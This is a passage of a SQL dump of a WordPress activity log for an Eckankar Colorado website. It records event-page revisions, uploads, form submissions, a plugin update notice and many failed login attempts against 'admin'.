<li>New paradigms to reveal the power of loving yourself, God and all of life.</li>\n</ul>\n<p class=\"mb-4\">You do not need to have attended prior classes or have read the book to participate. We will have complimentary copies available. Hope to see you there!</p>\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-longmont/events/296301686/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(215270,35493,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">What is Spiritual Freedom?<br>\r\n</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">What is Spiritual Freedom? Are you everything you want to be? You came into this life to spread your wings and live in freedom - heart, mind and Soul!</span><br>\r\n<span style=\"font-size: 14pt;\">Author Harold Klemp put the tools of spiritual freedom in your grasp:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Keys to embrace the highest expression of who you really are</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Techniques to tap into the divine Life Force for unlimited creativity and problem solving</span></li>\r\n	<li><span style=\"font-size: 14pt;\">New paradigms to reveal the power of loving yourself, God and all of life.</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You do not need to have attended prior classes or have read the book to participate. We will have complimentary copies available. Hope to see you there!</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/296358193/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(215271,35493,'post_prev_post_date','2023-09-28 07:21:12'),(215272,35493,'post_new_post_date','2023-09-28 07:22:08'),(215273,35493,'post_prev_thumb_id','269119'),(215274,35493,'post_prev_thumb_title','GoldenHeart2'),(215275,35493,'post_new_thumb_id','269122'),(215276,35493,'post_new_thumb_title','TemplePool'),(215277,35493,'_message_key','post_updated'),(215278,35493,'_user_id','15'),(215279,35493,'_user_login','john-admin-96'),(215280,35493,'_user_email','nadazipought@zilch.org'),(215281,35493,'_server_remote_addr','174.16.132.x'),(215282,35493,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269121&action=edit'),(215283,35494,'failed_username','admin'),(215284,35494,'server_http_user_agent','Mozilla/5.0'),(215285,35494,'_message_key','user_unknown_login_failed'),(215286,35494,'_server_remote_addr','74.249.245.x'),(215287,35495,'post_id','269121'),(215288,35495,'post_type','mec-events'),(215289,35495,'post_title','Achieving Spiritual Freedom in this Lifetime'),(215290,35495,'post_new_thumb_id','269122'),(215291,35495,'post_new_thumb_title','TemplePool'),(215292,35495,'post_meta_added','78'),(215293,35495,'_message_key','post_updated'),(215294,35495,'_user_id','15'),(215295,35495,'_user_login','john-admin-96'),(215296,35495,'_user_email','nadazipought@zilch.org'),(215297,35495,'_server_remote_addr','174.16.132.x'),(215298,35495,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269121&action=edit'),(215299,35496,'post_id','269121'),(215300,35496,'post_type','mec-events'),(215301,35496,'post_title','Achieving Spiritual Freedom in this Lifetime'),(215302,35496,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">What is Spiritual Freedom?<br>\n</span></strong></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">What is Spiritual Freedom? Are you everything you want to be? You came into this life to spread your wings and live in freedom - heart, mind and Soul!</span><br>\n<span style=\"font-size: 14pt;\">Author Harold Klemp put the tools of spiritual freedom in your grasp:</span></p>\n<ul class=\"pl-5 list-disc mb-4\">\n	<li><span style=\"font-size: 14pt;\">Keys to embrace the highest expression of who you really are</span></li>\n	<li><span style=\"font-size: 14pt;\">Techniques to tap into the divine Life Force for unlimited creativity and problem solving</span></li>\n	<li><span style=\"font-size: 14pt;\">New paradigms to reveal the power of loving yourself, God and all of life.</span></li>\n</ul>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You do not need to have attended prior classes or have read the book to participate. We will have complimentary copies available. Hope to see you there!</span></p>\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/296358193/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(215303,35496,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">What is Spiritual Freedom?<br>\r\n</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">What is Spiritual Freedom? Are you everything you want to be? You came into this life to spread your wings and live in freedom - heart, mind and Soul!</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Author Harold Klemp put the tools of spiritual freedom in your grasp:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Keys to embrace the highest expression of who you really are</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Techniques to tap into the divine Life Force for unlimited creativity and problem solving</span></li>\r\n	<li><span style=\"font-size: 14pt;\">New paradigms to reveal the power of loving yourself, God and all of life.</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You do not need to have attended prior classes or have read the book to participate. We will have complimentary copies available. Hope to see you there!</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/296358193/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(215304,35496,'post_prev_post_date','2023-09-28 07:23:05'),(215305,35496,'post_new_post_date','2023-09-28 07:23:18'),(215306,35496,'_message_key','post_updated'),(215307,35496,'_user_id','15'),(215308,35496,'_user_login','john-admin-96'),(215309,35496,'_user_email','nadazipought@zilch.org'),(215310,35496,'_server_remote_addr','174.16.132.x'),(215311,35496,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269121&action=edit'),(215312,35497,'post_id','269121'),(215313,35497,'post_type','mec-events'),(215314,35497,'post_title','Achieving Spiritual Freedom in this Lifetime'),(215315,35497,'post_prev_post_status','draft'),(215316,35497,'post_new_post_status','publish'),(215317,35497,'post_prev_post_date','2023-09-28 07:23:18'),(215318,35497,'post_new_post_date','2023-09-28 07:24:06'),(215319,35497,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(215320,35497,'post_new_post_date_gmt','2023-09-28 13:24:06'),(215321,35497,'_message_key','post_updated'),(215322,35497,'_user_id','15'),(215323,35497,'_user_login','john-admin-96'),(215324,35497,'_user_email','nadazipought@zilch.org'),(215325,35497,'_server_remote_addr','174.16.132.x'),(215326,35497,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269121&action=edit'),(215327,35498,'failed_username','admin'),(215328,35498,'server_http_user_agent','Mozilla/5.0'),(215329,35498,'_message_key','user_unknown_login_failed'),(215330,35498,'_server_remote_addr','74.249.245.x'),(215331,35499,'failed_username','admin'),(215332,35499,'server_http_user_agent','Mozilla/5.0'),(215333,35499,'_message_key','user_unknown_login_failed'),(215334,35499,'_server_remote_addr','20.81.40.x'),(215335,35500,'failed_username','admin'),(215336,35500,'server_http_user_agent','Mozilla/5.0'),(215337,35500,'_message_key','user_unknown_login_failed'),(215338,35500,'_server_remote_addr','74.249.245.x'),(215339,35501,'post_id','269124'),(215340,35501,'post_type','nf_sub'),(215341,35501,'post_title',''),(215342,35501,'_message_key','post_updated'),(215343,35501,'_server_remote_addr','73.229.62.x'),(215344,35501,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_News&utm_medium=email'),(215345,35502,'failed_username','admin'),(215346,35502,'server_http_user_agent','Mozilla/5.0'),(215347,35502,'_message_key','user_unknown_login_failed'),(215348,35502,'_server_remote_addr','74.249.245.x'),(215349,35503,'failed_username','admin'),(215350,35503,'server_http_user_agent','Mozilla/5.0'),(215351,35503,'_message_key','user_unknown_login_failed'),(215352,35503,'_server_remote_addr','20.81.40.x'),(215353,35504,'failed_username','admin'),(215354,35504,'server_http_user_agent','Mozilla/5.0'),(215355,35504,'_message_key','user_unknown_login_failed'),(215356,35504,'_server_remote_addr','74.249.245.x'),(215357,35505,'failed_username','admin'),(215358,35505,'server_http_user_agent','Mozilla/5.0'),(215359,35505,'_message_key','user_unknown_login_failed'),(215360,35505,'_server_remote_addr','74.249.245.x'),(215361,35506,'failed_username','admin'),(215362,35506,'server_http_user_agent','Mozilla/5.0'),(215363,35506,'_message_key','user_unknown_login_failed'),(215364,35506,'_server_remote_addr','74.249.245.x'),(215365,35507,'failed_username','admin'),(215366,35507,'server_http_user_agent','Mozilla/5.0'),(215367,35507,'_message_key','user_unknown_login_failed'),(215368,35507,'_server_remote_addr','20.81.40.x'),(215369,35508,'failed_username','admin'),(215370,35508,'server_http_user_agent','Mozilla/5.0'),(215371,35508,'_message_key','user_unknown_login_failed'),(215372,35508,'_server_remote_addr','74.249.245.x'),(215373,35509,'failed_username','admin'),(215374,35509,'server_http_user_agent','Mozilla/5.0'),(215375,35509,'_message_key','user_unknown_login_failed'),(215376,35509,'_server_remote_addr','74.249.245.x'),(215377,35510,'failed_username','admin'),(215378,35510,'server_http_user_agent','Mozilla/5.0'),(215379,35510,'_message_key','user_unknown_login_failed'),(215380,35510,'_server_remote_addr','20.81.40.x'),(215381,35511,'failed_username','admin'),(215382,35511,'server_http_user_agent','Mozilla/5.0'),(215383,35511,'_message_key','user_unknown_login_failed'),(215384,35511,'_server_remote_addr','74.249.245.x'),(215385,35512,'failed_username','admin'),(215386,35512,'server_http_user_agent','Mozilla/5.0'),(215387,35512,'_message_key','user_unknown_login_failed'),(215388,35512,'_server_remote_addr','74.249.245.x'),(215389,35513,'failed_username','admin'),(215390,35513,'server_http_user_agent','Mozilla/5.0'),(215391,35513,'_message_key','user_unknown_login_failed'),(215392,35513,'_server_remote_addr','74.249.245.x'),(215393,35514,'failed_username','admin'),(215394,35514,'server_http_user_agent','Mozilla/5.0'),(215395,35514,'_message_key','user_unknown_login_failed'),(215396,35514,'_server_remote_addr','20.81.40.x'),(215397,35515,'failed_username','admin'),(215398,35515,'server_http_user_agent','Mozilla/5.0'),(215399,35515,'_message_key','user_unknown_login_failed'),(215400,35515,'_server_remote_addr','74.249.245.x'),(215401,35516,'failed_username','admin'),(215402,35516,'server_http_user_agent','Mozilla/5.0'),(215403,35516,'_message_key','user_unknown_login_failed'),(215404,35516,'_server_remote_addr','20.81.40.x'),(215405,35517,'failed_username','admin'),(215406,35517,'server_http_user_agent','Mozilla/5.0'),(215407,35517,'_message_key','user_unknown_login_failed'),(215408,35517,'_server_remote_addr','20.81.40.x'),(215409,35518,'failed_username','geoff'),(215410,35518,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(215411,35518,'_message_key','user_unknown_login_failed'),(215412,35518,'_xmlrpc_request','true'),(215413,35518,'_server_remote_addr','20.104.170.x'),(215414,35519,'failed_username','admin'),(215415,35519,'server_http_user_agent','Mozilla/5.0'),(215416,35519,'_message_key','user_unknown_login_failed'),(215417,35519,'_server_remote_addr','20.81.40.x'),(215418,35520,'failed_username','admin'),(215419,35520,'server_http_user_agent','Mozilla/5.0'),(215420,35520,'_message_key','user_unknown_login_failed'),(215421,35520,'_server_remote_addr','20.81.40.x'),(215422,35521,'failed_username','admin'),(215423,35521,'server_http_user_agent','Mozilla/5.0'),(215424,35521,'_message_key','user_unknown_login_failed'),(215425,35521,'_server_remote_addr','20.81.40.x'),(215426,35522,'failed_username','admin'),(215427,35522,'server_http_user_agent','Mozilla/5.0'),(215428,35522,'_message_key','user_unknown_login_failed'),(215429,35522,'_server_remote_addr','20.81.40.x'),(215430,35523,'failed_username','admin'),(215431,35523,'server_http_user_agent','Mozilla/5.0'),(215432,35523,'_message_key','user_unknown_login_failed'),(215433,35523,'_server_remote_addr','20.81.40.x'),(215434,35524,'failed_username','admin'),(215435,35524,'server_http_user_agent','Mozilla/5.0'),(215436,35524,'_message_key','user_unknown_login_failed'),(215437,35524,'_server_remote_addr','20.81.40.x'),(215438,35525,'failed_username','admin'),(215439,35525,'server_http_user_agent','Mozilla/5.0'),(215440,35525,'_message_key','user_unknown_login_failed'),(215441,35525,'_server_remote_addr','20.81.40.x'),(215442,35526,'failed_username','admin'),(215443,35526,'server_http_user_agent','Mozilla/5.0'),(215444,35526,'_message_key','user_unknown_login_failed'),(215445,35526,'_server_remote_addr','20.81.40.x'),(215446,35527,'failed_username','admin'),(215447,35527,'server_http_user_agent','Mozilla/5.0'),(215448,35527,'_message_key','user_unknown_login_failed'),(215449,35527,'_server_remote_addr','20.81.40.x'),(215450,35528,'failed_username','admin'),(215451,35528,'server_http_user_agent','Mozilla/5.0'),(215452,35528,'_message_key','user_unknown_login_failed'),(215453,35528,'_server_remote_addr','20.81.40.x'),(215454,35529,'failed_username','admin'),(215455,35529,'server_http_user_agent','Mozilla/5.0'),(215456,35529,'_message_key','user_unknown_login_failed'),(215457,35529,'_server_remote_addr','20.81.40.x'),(215458,35530,'failed_username','admin'),(215459,35530,'server_http_user_agent','Mozilla/5.0'),(215460,35530,'_message_key','user_unknown_login_failed'),(215461,35530,'_server_remote_addr','20.81.40.x'),(215462,35531,'failed_username','admin'),(215463,35531,'server_http_user_agent','Mozilla/5.0'),(215464,35531,'_message_key','user_unknown_login_failed'),(215465,35531,'_server_remote_addr','20.81.40.x'),(215466,35532,'failed_username','admin'),(215467,35532,'server_http_user_agent','Mozilla/5.0'),(215468,35532,'_message_key','user_unknown_login_failed'),(215469,35532,'_server_remote_addr','20.81.40.x'),(215470,35533,'failed_username','admin'),(215471,35533,'server_http_user_agent','Mozilla/5.0'),(215472,35533,'_message_key','user_unknown_login_failed'),(215473,35533,'_server_remote_addr','20.81.40.x'),(215474,35534,'failed_username','admin'),(215475,35534,'server_http_user_agent','Mozilla/5.0'),(215476,35534,'_message_key','user_unknown_login_failed'),(215477,35534,'_server_remote_addr','20.81.40.x'),(215478,35535,'failed_username','admin'),(215479,35535,'server_http_user_agent','Mozilla/5.0'),(215480,35535,'_message_key','user_unknown_login_failed'),(215481,35535,'_server_remote_addr','20.81.40.x'),(215482,35536,'failed_username','admin'),(215483,35536,'server_http_user_agent','Mozilla/5.0'),(215484,35536,'_message_key','user_unknown_login_failed'),(215485,35536,'_server_remote_addr','20.81.40.x'),(215486,35537,'plugin_name','Backup Duplicator &amp; Migration - WP STAGING'),(215487,35537,'plugin_current_version','3.0.4'),(215488,35537,'plugin_new_version','3.0.6'),(215489,35537,'_message_key','plugin_update_available'),(215490,35537,'_server_remote_addr','173.231.231.x'),(215491,35538,'failed_username','admin'),(215492,35538,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(215493,35538,'_message_key','user_unknown_login_failed'),(215494,35538,'_server_remote_addr','51.38.52.x'),(215495,35539,'post_id','269125'),(215496,35539,'post_type','nf_sub'),(215497,35539,'post_title',''),(215498,35539,'_message_key','post_updated'),(215499,35539,'_server_remote_addr','74.92.211.x'),(215500,35539,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_News&utm_medium=email'),(215501,35540,'post_id','269126'),(215502,35540,'post_type','nf_sub'),(215503,35540,'post_title',''),(215504,35540,'_message_key','post_updated'),(215505,35540,'_server_remote_addr','71.237.88.x'),(215506,35540,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_News&utm_medium=email'),(215507,35541,'post_id','269127'),(215508,35541,'post_type','nf_sub'),(215509,35541,'post_title',''),(215510,35541,'_message_key','post_updated'),(215511,35541,'_server_remote_addr','73.78.148.x'),(215512,35541,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(215513,35542,'failed_username','admin'),(215514,35542,'server_http_user_agent','python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.71.1.el7.x86_64'),(215515,35542,'_message_key','user_unknown_login_failed'),(215516,35542,'_xmlrpc_request','true'),(215517,35542,'_server_remote_addr','43.138.247.x'),(215518,35542,'_server_http_referer','https://eckankar-colorado.org/xmlrpc.php'),(215519,35543,'failed_username','admin'),(215520,35543,'server_http_user_agent','python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.71.1.el7.x86_64'),(215521,35543,'_message_key','user_unknown_login_failed'),(215522,35543,'_xmlrpc_request','true'),(215523,35543,'_server_remote_addr','43.138.247.x'),(215524,35543,'_server_http_referer','https://eckankar-colorado.org/xmlrpc.php'),(215525,35544,'failed_username','admin'),(215526,35544,'server_http_user_agent','python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.71.1.el7.x86_64'),(215527,35544,'_message_key','user_unknown_login_failed'),(215528,35544,'_xmlrpc_request','true'),(215529,35544,'_server_remote_addr','43.138.247.x'),(215530,35544,'_server_http_referer','https://eckankar-colorado.org/xmlrpc.php'),(215531,35545,'failed_username','admin'),(215532,35545,'server_http_user_agent','python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.71.1.el7.x86_64'),(215533,35545,'_message_key','user_unknown_login_failed'),(215534,35545,'_xmlrpc_request','true'),(215535,35545,'_server_remote_addr','43.138.247.x'),(215536,35545,'_server_http_referer','https://eckankar-colorado.org/xmlrpc.php'),(215537,35546,'failed_username','eckankar-colorado'),(215538,35546,'server_http_user_agent','python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.71.1.el7.x86_64'),(215539,35546,'_message_key','user_unknown_login_failed'),(215540,35546,'_xmlrpc_request','true'),(215541,35546,'_server_remote_addr','43.138.247.x'),(215542,35546,'_server_http_referer','https://eckankar-colorado.org/xmlrpc.php'),(215543,35547,'failed_username','eckankar-colorado'),(215544,35547,'server_http_user_agent','python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.71.1.el7.x86_64'),(215545,35547,'_message_key','user_unknown_login_failed'),(215546,35547,'_xmlrpc_request','true'),(215547,35547,'_server_remote_addr','43.138.247.x'),(215548,35547,'_server_http_referer','https://eckankar-colorado.org/xmlrpc.php'),(215549,35548,'failed_username','eckankar-colorado'),(215550,35548,'server_http_user_agent','python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.71.1.el7.x86_64'),(215551,35548,'_message_key','user_unknown_login_failed'),(215552,35548,'_xmlrpc_request','true'),(215553,35548,'_server_remote_addr','43.138.247.x'),(215554,35548,'_server_http_referer','https://eckankar-colorado.org/xmlrpc.php'),(215555,35549,'failed_username','admin'),(215556,35549,'server_http_user_agent','python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.71.1.el7.x86_64'),(215557,35549,'_message_key','user_unknown_login_failed'),(215558,35549,'_xmlrpc_request','true'),(215559,35549,'_server_remote_addr','43.138.247.x'),(215560,35549,'_server_http_referer','https://eckankar-colorado.org/xmlrpc.php'),(215561,35550,'failed_username','rich'),(215562,35550,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(215563,35550,'_message_key','user_unknown_login_failed'),(215564,35550,'_xmlrpc_request','true'),(215565,35550,'_server_remote_addr','74.249.244.x'),(215566,35551,'failed_username','admin'),(215567,35551,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(215568,35551,'_message_key','user_unknown_login_failed'),(215569,35551,'_xmlrpc_request','true'),(215570,35551,'_server_remote_addr','74.249.245.x'),(236816,40261,'_message_key','post_updated'),(236817,40261,'_user_id','2'),(236818,40261,'_user_login','S8zhaBda'),(236819,40261,'_user_email','nada@zipnadanot.org'),(236820,40261,'_server_remote_addr','76.130.120.x'),(236821,40261,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(236822,40262,'post_type','attachment'),(236823,40262,'attachment_id','269279'),(236824,40262,'attachment_title','wave-white-2-h-200'),(236825,40262,'attachment_filename','wave-white-2-h-200.png'),(236826,40262,'attachment_mime','image/png'),(236827,40262,'attachment_filesize','12000'),(236828,40262,'_message_key','attachment_created'),(236829,40262,'_user_id','2'),(236830,40262,'_user_login','S8zhaBda'),(236831,40262,'_user_email','nada@zipnadanot.org'),(236832,40262,'_server_remote_addr','76.130.120.x'),(236833,40262,'_server_http_referer','https://eckankar-colorado.org/wp-admin/media-new.php'),(236834,40263,'post_id','7160'),(236835,40263,'post_type','page'),(236836,40263,'post_title','Home'),(236837,40263,'post_prev_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: 